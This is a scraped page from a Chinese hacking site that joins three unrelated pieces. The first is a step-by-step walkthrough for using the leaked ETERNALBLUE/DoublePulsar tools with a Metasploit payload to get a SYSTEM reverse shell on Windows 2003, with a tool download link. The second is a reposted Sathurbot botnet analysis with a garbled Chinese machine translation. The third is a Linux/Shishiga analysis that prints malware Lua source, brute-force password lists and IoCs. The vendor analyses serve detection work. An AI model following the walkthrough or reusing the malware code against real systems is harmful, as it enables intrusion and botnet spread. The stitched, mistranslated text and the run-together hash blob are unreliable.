方程式ETERNALBLUE 下载地址:www.hackerschina.org点我下载.;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。

在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致

2.测试过程

进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。

根据提示,输入0创建一个新的项目,项目名为test

接下来使用use Eternalblue,一路回车:

这里要注意,根据提示选项,这里选择1,然后继续一路回车


在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:

在msf下开启msfpaylod监听:


接下来继续在windows2003上执行use Doublepulsar

根据提示选择对应系统,运行dll文件,设置dll文件路径


最后在MSF中可以看到,成功反弹shell,拿到系统权限。

3.漏洞利用工具

PS:由于目前软件还未完善,如果有需要的可以加群获取

4.防御措施

所有Windows系统主机使用防火墙过滤/关闭 137、139、445端口,对于3389远程登录,如果不想关闭可以使用智能卡登录功能.

Sathurbot: Distributed WordPress password attack HackersChina分布式WordPress密码攻击

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations ofBoaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted aslogin:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. Particularly the wp.getUsersBlogsAPI is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks onwp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exeand/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of rundll32.exe or explorer.exe process and locks files and registry keys from editing. It is present in both x32 and x64 bit versions in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

BENWEN揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。HACKERSCHINA

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C &#38; C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息

Linux Shishiga malware using LUA scripts CHINAhackerkskchina www.hackerschina.org

Among all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web – their detection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family have generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents a new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name: Linux/Shishiga. It uses 4 different protocols (SSH – Telnet – HTTP – BitTorrent) and Lua scripts for modularity.

How to Meet Shishiga?

Linux/Shishiga targets GNU/Linux systems. Its infection vector is a very common one: bruteforcing weak credentials based on a password list. It does this in a similar fashion to Linux/Moose with the added capability to bruteforce SSH credentials too. Here is the complete credentials list at the time of writing:

bftelnet.lua
[...]local accounts={    {"admin","admin"},    {"root","root"},    {"adm","adm"},    {"acer","acer"},    {"user","user"},    {"security","security"}}[...]
bfssh.lua
[...]local accounts={    {"admin","admin"},    {"root","root"},    {"adm","adm"},    {"ubnt","ubnt"},    {"root",""},    {"admin",""},    {"adm",""},    {"user","user"},    {"pi","pi"},}--[[    {"acer","acer"},    {"security","security"},    {"root","toor"},    {"root","roottoor"},    {"root","password"},    {"root","test"},    {"root","abc123"},    {"root","111111"},    {"root","1q2w3e"},    {"root","oracle"},    {"root","1q2w3e4r"},    {"root","123123"},    {"root","qwe123"},    {"root","p@ssw0rd"},    {"root","1"},    {"root","12"},    {"root","123"},    {"root","1234"},    {"root","12346"},    {"root","123467"},    {"root","1234678"},    {"root","12346789"},    {"root","123467890"},    {"root","qwerty"},    {"root","pass"},    {"root","toor"},    {"root","roottoor"},    {"root","password123"},    {"root","password123456"},    {"root","pass123"},    {"root","password"},    {"root","passw0rd"},    {"root","1qaz"},    {"root","1qaz2wsx"},    {"root","asdfgh"},    {"user","user"},    {"user",""},    {"acer","acer"},    {"security","security"},    {"root","passw0rds"},]][...]

We found several binaries of Linux/Shishiga for various architectures such as MIPS (both big- and little-endian), ARM (armv4l), i686, and also PowerPC. These are common for IoT devices. We think that other architectures like SPARC, SH-4 or m68k could be supported as we will explain later.

Shishiga’s skills

Linux/Shishiga is a binary packed with UPX 3.91 (Ultimate Packer for Executables), but the UPX tool will have trouble unpacking these binaries because Shishiga adds data at the end of the packed file.

After unpacking, we see that it’s statically linked with the Lua runtime library and stripped of all symbols.

$ file unpacked.i686.lmunpacked.i686.lm: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux),statically linked, stripped

Once executed, the binary will initialize the malware Lua module with the following methods:

Malware methods
malware_module_methods  dd offset aGetver       ; "getver"                        dd offset getver                        dd offset aGetos        ; "getos"                        dd offset getos                        dd offset aGetarch      ; "getarch"                        dd offset getarch                        dd offset aGetmacaddr   ; "getmacaddr"                        dd offset getmacaddr                        dd offset aGetmods      ; "getmods"                        dd offset getmods                        dd offset aSetargs      ; "setargs"                        dd offset setargs

The getmods method will return the archive blob as we will explain later. Then hardcoded Lua code (malware.lua) is executed via the luaL_loadstring and lua_pcall functions. The Lua code is quite straightforward, but here is a quick walkthrough of the source code without any modifications from our part.

malware.lua
local unistd=require("posix.unistd")require("malware")function getexe()    local fn=unistd.readlink("/proc/self/exe")    if fn==nil and arg~=nil then        fn=arg[0] --symlink removed    end    if fn==nil then        print("couldn't find bot file")        return nil    end    local file=io.open(fn,"r")    if file==nil then        print("couldn't find bot file")        return nil    end    local data=file:read("*all")    file:close()    return dataendfunction getMods()    return zlib.inflate()(malware.getmods())endfunction getScriptFiles(scripts)    local files={}    local i=1    while true do        local a1,b1,c1=string.find(scripts,'%-%-script%-begin%-%-([%w%.]+)%-%-',i)        if a1==nil then            break        end        local a2,b2,c2=string.find(scripts,'%-%-script%-end%-%-([%w%.]+)%-%-',i)        if a2==nil then            break        end        if c1~=c2 then            return nil        end        local src=string.sub(scripts,b1+1,a2-1)        i=b2+1        files[c1]=src    end    return filesendmalware.exe=getexe() (1)local modules=getScriptFiles(getMods()) (2)[...]f=load(malware.modules['main.lua']) (3)local s,err=pcall(f)if s==false then    print(err)end
(1)open the malware executable file from /proc/self/exe and return its content;
(2)retrieve the zlib archive via getmods method, decompresses it, then parses it using tags and stores it in a Lua’s array;
(3)call main.lua module;

There is an exhaustive list of all Lua scripts found in the IoCs section. Most of them have self-explanatory filenames, but here is a brief summary of some of them.

callhome.lua

  • retrieve the configuration file server.bt or servers from config.lua;
  • if unable to reach the current default server, change to a different server;
  • send files (reports or accounts, both JSON formatted);
  • execute tasks from task list retrieved from the C&C server;

bfssh.lua / bftelnet.lua

  • module to bruteforce SSH and Telnet logins;
  • check if the command echo -en "\\x31\\x33\\x33\\x37" outputs 1337; if not, exit else continue;
  • device architecture is determined from the /bin/ls file by running cat /bin/ls and parsing theELF header, see below;
  • spread the malware (both .lm and .dm files) according to the device architecture;
  • save successful credentials;

The architecture checking code is as follows:

bfssh.lua, getArchELF method
function bfssh.getArchELF(text)	local bits,denc,ver,ftype,farch	if text==nil then		return nil	end	local i=text:find("\x7fELF") (1)	if i~=nil then		bits,denc,ver=string.unpack("<BBB",text:sub(i+4))		if denc==1 then			ftype,farch=string.unpack("<HH",text:sub(i+16)) (2)		else			ftype,farch=string.unpack(">HH",text:sub(i+16))		end	end	return bits,denc,farch (3)end
(1)every ELF file has to start with \x7fELF
(2)ftype that represents e_type (ELF file type = executable, shared etc.) is not used
(3)bits represents e_ident[EI_CLASS] (32-bit or 64-bit), denc represents e_ident[EI_DATA](little or big endian), and farch represents e_machine in the ELF header
bfssh.lua, getArchName method
function bfssh.getArchName(bits,denc,farch) (1)        if farch==0x8 and denc==1 then (2)                return "mipsel"        end        if farch==0x8 and denc==2 then                return "mips"        end        if farch==0x28 then                return "armv4l"        end        if farch==0x2 then                return "sparc"        end        if farch==0x2a then                return "sh4"        end        if farch==0x4 then                return "m68k"        end        if farch==0x14 then                return "powerpc"        end        if farch==0x3 or farch==0x7 or farch==0x3e then (3)                return "i686"        end        return nilend
(1)bits is not used
(2)check if file is for MIPS little endian (e_machine == EM_MIPS and e_ident[EI_DATA] ==ELFDATA2LSB)
(3)check if file is for Intel 80386 or Intel 80860 or AMD x86-64 (e_machine == EM_386 ore_machine == EM_860 or e_machine == EM_X86_64)

config.lua

  • contains publicKey to verify the signature of the binary (.lm or .dm);
  • contains bootstrap nodes list;
  • contains filenames of .bt files, port numbers of SOCKS and HTTP server;
  • contains IP address of the server (probably C&C server);

persist.lua

  • persistence method depending on the privilege (root or user)

scanner.lua

  • used to generate random /16 networks that are not local

worm.lua (this script was removed in the latest version of Linux/Shishiga)

  • allows scanning on a given port;
  • allows upload;
  • gets information from the new infected server;

The readme.lua script has a message banner that grabs your attention, if you speak Russian:

           ВСЁ ИДЁТ ПО ПЛАНУА при коммунизме всё будет заебисьОн наступит скоро — надо только подождатьТам всё будет бесплатно,там всё будет в кайфТам наверное вощще не надо будет (умирать)Я проснулся среди ночи и понял, что -           ВСЁ ИДЁТ ПО ПЛАНУ

This translates to:

            EVERYTHING GOES ACCORDING TO PLANWhen we get communism it'll all be fucking great.It will come soon, we just have to wait.Everything will be free there, everything will be fun.We'll probably not even have to die.I woke up in the middle of the night and realized            EVERYTHING GOES ACCORDING TO PLAN

It seems that the malware author was inspired by E.Letov and his album Everything goes according to plan – see the last verse of the title song.

Over the past few weeks, we observed some minor changes like parts of some modules being rewritten, addition of testing modules, removal of redundant files, but nothing especially noteworthy.

While the main binary is named <architecture>.lm, we also managed to retrieve binaries with the following name <architecture>.dm – a simple backdoor that listens on 0.0.0.0 (all IPv4 addresses) port 2015. One of the small changes was in the name of this backdoor binary – it changed from dl to dm.

Shishiga communication

Linux/Shishiga can communicate using any of the modules httpproto.lua, btloader.lua orserver.lua. The httpproto.lua module has functions that allow the given data to be encoded or decoded, and make HTTP POST and GET requests. The source code below shows the process of encoding data.

httpproto.lua
[...]function httpproto.encode(data)    local msg=bencode.encode(data)    local c=zlib.crc32()(msg)    local k=string.pack("<I",utils.random())    return k..crypto.rc4(k,string.pack("<I",c)..msg)end[...]

btloader.lua uses the torrent.lua module (a wrapper for BitTorrent functions) to save or load nodes from the nodes.cfg file. It also retrieves its configuration data from{server,update,script}.bt files (in Bencode format) and uses the BitTorrent protocol to check for new versions of these files. script.bt allows the execution of a Lua script and update.bt allows executing the .lm binary. Below are examples of decoded .bt files shown as Python dictionaries.

script.bt
{    'sig': <removed>,(1)    'k': <removed>,(2)    'salt': 'script',    'seq': 1486885364,    'v': 'caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\n'}
(1)signature
(2)public key
update.bt
{    'sig': <removed>,    'k': <removed>,    'salt': 'update',    'seq': 1486885364,    'v':        'bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\n        8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\n        51a4ca78ebb0649721ae472290bea7bfe983d727,mips.lm\n        979fb376d6adc65473c4f51ad1cc36e3612a1e73,powerpc.lm\n        ce4b3c92a96137e6215a5e2f5fd28a672eddaaab,i686.lm\n'}
server.bt
{    'sig': <removed>,    'k': <removed,    'salt': 'server',    'seq': 1486835166,    'v': '93.117.137.35:8080\n'}

Finally, server.lua module’s main functionality is to create an HTTP server with the port defined inconfig.lua. In all samples we have analyzed so far, that is port 8888.

The server responds only to /info and /upload requests. Below is a (prettified) version of the server response to the /info path. All of the files below can be easily downloaded from the infected device.

{    "src":[ (1)        "test.lua",        "test1.lua",        "test10.lua",        "test2.lua",        "test3.lua",        "test5.lua",        "test6.lua",        "test_1.lua",        "test_2.lua",        "test_3.lua",        "test_4.lua"    ],    "dm":[ (2)        "armv4l.dm",        "i686.dm",        "mips.dm",        "mipsel.dm"    ],    "bt":[ (3)        "script.bt",        "server.bt",        "update.bt"    ],    "version":"1.0.0", (4)    "lua":[ (5)        "armv4l.lm",        "i686.lm",        "mips.lm",        "mipsel.lm",        "powerpc.lm"    ],    "os":"lin",    "arch":"i686",    "lua_version":"Lua 5.3"}
(1)Lua scripts
(2)backdoor (old name: .dl)
(3)BitTorrent scripts
(4)malware version
(5)modules loader

Querying the root / on port 8888 will result in HTTP/1.0 404 OK, which serves as a simple indicator of compromise (IoC).

http.lua response function
function http.response(req,code,data,timeout)    timeout=timeout or timeoutDef    local hdr="HTTP/1.0 %d OK\r\nContent-Length: %d\r\nConnection: close\r\n\r\n"    async.sendall(req.sock,hdr:format(code,data:len())..data,timeout)    return trueend

At this point in our investigation, we asked the Censys team to do a mass scan of the Internet on TCP port 8888. They found about 10 IP addresses that match this particular HTTP answer. These IP addresses are potentially infected machines.

Conclusion

At a first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH credentials, but the usage of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used in a Mirai-inspired worm, Hajime, was observed last year and we can only speculate that it might become more popular in the future.

It’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant adding, removing, and modifying of the components, code comments and even debug information, clearly indicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.

We would like to thank the Censys team for their collaboration.

IoCs

C&C

93.117.137.35

SHA-1 hashes (.lm)
003f548796fb52ad281ae82c7e0bb7532dd342411a79092c6468d39a10f805c96ad7f8bf303b7dc81cc1b97f8f9bb7c4f435ef1316e08e5331b4331b2889803777e2dfec7684512f45e87248a07d508f2a809d37be5aa0655f5cc997eb62683e1b45da173f1ef05ca850e2f5030ee279b1c589c9e3cc576c41bf0d5612ba5bc9a05e9d94df0f841b159264a04bc106f6231daa6641783dd9276b4f5c7fc415894d55efe18643d7408cbe12dd4f319a68084bd11e4df58ab26f0fc8ec2d1513611ca2b852e710709651a4ca78ebb0649721ae472290bea7bfe983d7275a88b67d8dfaf1f68308311b808f00e769e39e466458c48e5167a2371d9243d4b47ad191d642685b688ccbca8b2918a161917031e21b6810c59eeab06e3ba86d1f91669e87945b8ea0211b58e315e1896f41c8f797814e2e3f073601ce81e8adceef6a278a0d58472f6166ade0ae677bab7940fe38d66d358a1f9212f181e68a63e06a955e64d333b78c6bf68e3c4eb04d4cfd8f44c721111c5251d30ac848b6979fb376d6adc65473c4f51ad1cc36e3612a1e73a1f2535576116d93b62d7f5fc6e30e66e0e0a216a694c6ecc2ff9702905f22b14ed448e9e76fe531ac094b239851eaf2e9fd309285c0996fb33771a8b14f7af9665ef77af530109a0331f8ca0bd2a167b86935c4539901cdec9081d8a8ca915903adaff1ba5df105496b0c4df7206d29fa544b7a7a346735bf4d9e25fc210a1d9809aebb03b30748dd588d08c22f0fb01